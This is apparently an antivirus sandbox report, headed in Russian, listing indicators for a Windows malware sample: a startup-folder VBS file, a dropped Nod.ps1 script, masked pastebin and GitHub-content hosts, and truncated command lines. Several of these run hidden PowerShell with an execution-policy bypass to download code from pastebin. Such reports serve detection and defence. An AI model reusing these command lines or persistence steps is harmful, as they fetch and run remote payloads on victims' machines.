Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\avastt.vbs
- %WINDIR%\microsoft.net\framework\v2.0.50727\regasm.exe
- C:\users\public\nod.ps1
- 'pa###bin.com':443
- 'gi##.###hubusercontent.com':443
- DNS ASK pa###bin.com
- DNS ASK gi##.###hubusercontent.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file "C:\Users\Public\Nod.ps1"
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file "C:\Users\Public\Nod.ps1"' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://pastebin...
- '<SYSTEM32>\wscript.exe' "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\avastt.vbs"
- '%WINDIR%\microsoft.net\framework\v2.0.50727\regasm.exe'